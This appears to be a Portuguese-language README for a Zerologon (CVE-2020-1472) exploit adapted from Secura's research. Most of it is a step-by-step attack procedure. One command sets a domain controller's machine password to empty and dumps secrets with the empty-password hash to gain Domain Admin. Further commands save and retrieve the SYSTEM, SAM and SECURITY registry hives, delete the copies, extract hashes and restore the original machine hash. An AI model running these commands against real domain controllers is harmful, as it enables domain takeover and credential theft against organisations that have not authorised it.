
Exploit para zerologon cve-2020-1472
Código de exploração baseado em https://www.secura.com/blog/zero-logon e https://github.com/SecuraBV/CVE-2020-1472. Pesquisa e scanner originais por Secura, modificações por RiskSense Inc.
Para explorar, remova quaisquer instalações anteriores do Impacket e instale o Impacket a partir de https://github.com/SecureAuthCorp/impacket/commit/b867b21 ou mais recente. Em seguida, execute:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Se isso for bem-sucedido, você poderá então:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
o que deve lhe conceder acesso de Administrador de Domínio. Depois de obtê-lo, use wmiexec.py no DC alvo com uma credencial extraída do secretsdump e execute
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
Então você pode
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
E isso deve mostrar o hash NT original da conta da máquina. Você pode então reinstalar esse hash original da conta da máquina no domínio executando
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Reinstalar o hash original é necessário para que o DC continue operando normalmente.